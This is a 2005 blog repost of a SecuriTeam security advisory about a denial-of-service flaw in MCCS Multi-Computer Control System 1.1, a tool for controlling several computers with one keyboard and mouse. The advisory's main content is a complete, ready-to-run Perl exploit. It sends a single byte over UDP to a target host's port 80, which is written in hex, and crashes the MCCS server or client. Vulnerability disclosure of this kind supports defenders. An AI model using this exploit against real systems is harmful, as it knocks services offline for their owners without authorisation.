Search This Blog

Thursday, September 29, 2005

[EXPL] MCCS Server and Client Command DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

MCCS Server and Client Command DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.xclusive-software.com/> MCCS "allows you can control up to 15
computers with single mouse / keyboard. Also, the clipboard is transfered
from one computer to another when you navigate. No need for expansive KVM
switch. (Keyboard, Video, Mouse switch). You can be more productive in
your tasks. ".

Lack of proper input validation allows attacker to cause a DoS condition
within MCCS, the following exploit code can be used to test your systems
for the mentioned vulnerability.

DETAILS

Vulnerable Systems:
* MCCS Multi-Computer Control System version 1.1

Exploit:
#!usr/bin/perl
#
# MCCS Server\Client Command DOS Exploit
# --------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.xclusive-software.com
#

use IO::Socket;

print("\n MCCS Command DOS Exploit\n");
print("-----------------------------\n");

$str = "\x41";
if($#ARGV < 0 | $#ARGV > 1) {
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };

$adr = $ARGV[0];
$prt = "\x38\x30";

print "[+] Connect to host..\n";
sleep 2;
$remote = IO::Socket::INET->new(Proto=>"\x75\x64\x70", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to
$adr:$prt\n";
print "[+] Connected\n";
$remote->autoflush(1);
print "[+] Sending bad string..\n";
sleep 2;
print $remote "$str" or die "[-] Error: can't send string code\n";
print "[*] Client Server SHUTDOWNED!\n\n";
print "press any key to exit..\n";
$bla= <STDIN>;
close $remote;

#EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:basher13@linuxmail.org>
basher13.
The original article can be found at:
<http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=93> http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=93

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: